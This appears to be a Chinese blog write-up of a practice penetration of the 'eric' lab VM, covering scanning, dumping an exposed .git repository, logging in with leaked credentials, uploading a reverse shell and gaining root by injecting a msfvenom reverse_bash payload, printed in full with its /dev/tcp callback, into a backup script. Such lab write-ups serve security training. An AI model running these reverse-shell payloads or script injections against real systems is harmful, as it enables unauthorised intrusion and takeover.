美文网首页
eric渗透实战

eric渗透实战

作者: 城市烈人 | 来源:发表于2019-04-13 19:50 被阅读0次

靶机IP :192.168.56.103

nmap扫

nmap -sS -Pn -A -p- -n 192.168.56.103
image.png

靶机比较简单,只开启了22和80端口

nmap探测到了192.168.56.103:80/.git/

WEB渗透

先探测下目录

dirb http://192.168.56.103
image.png

发现了几个可疑目录:

http://192.168.56.103/.git/HEAD
http://192.168.56.103/admin.php
http://192.168.56.103/upload/

admin.php是一个登录页面


image.png

/.git/HEAD/提示 http://192.168.56.103/.git/refs/heads/master

得到一串hash

3db5628b550f5c9c9f6f663cd158374035a6eaa0

关于/.git,查看下资料 https://blog.csdn.net/mayfla/article/details/78653396

将网站站点下的一些项目存放在git文件夹下

可以利用githach工具,将git文件夹down下来,进行审计查看

GitHack工具github地址:https://github.com/lijiejie/GitHack

python GitHack.py http://192.168.56.103/.git/
image.png

getshell

查看下admin.php的源码


image.png

拿到了用户密码

admin  |  st@mpch0rdt.ightiRu$glo0mappL3

登录后进入网站后台,发现了上传点


image.png

直接上传反弹shell,kali中nc监听,触发反弹


image.png

靶机没有python环境

进入home目录下的当前用户,发现了第一个flag,还发现了backup等备份文件


image.png

查看该sh文件,


image.png
#!/bin/bash
zip -r /home/eric/backup.zip /var/www/html

就是将网站的根目录下打包到当前目录的backup.zip中

提权

用msfvenom生成提权的sh脚本

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.56.102 LPORT=9999 -f raw > shell.sh
image.png
0<&63-;exec 63<>/dev/tcp/192.168.56.102/9999;sh <&63 >&63 2>&63

将生成的sh脚本,添加到backup.sh中等待执行即可

在msf中选择相应的payload进行监听

use exploit/multi/handler
set payload cmd/unix/reverse_bash
image.png

反弹成功后,拿到root权限,直接get flag


image.png

总结

该靶机总体是比较常规:
1、利用GitHack工具down下该站点的源文件
2、进入后台后上传反弹shell
3、发现可以执行root用户的权限,即可获取root-shell,通过msf生成的payload和反弹监听拿到root

靶机百度云下载
链接:https://pan.baidu.com/s/1lu4Axhsl9lxUUhb5HWO2FQ
提取码:qagq

相关文章

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

  • Lampiao渗透实战

    在Lampiao渗透中,drupal 7的getshell漏洞值得深入学习,有机会自己可以复现,了解一下原理;该靶...

网友评论

      本文标题:eric渗透实战

      本文链接:https://www.haomeiwen.com/subject/iwbrwqtx.html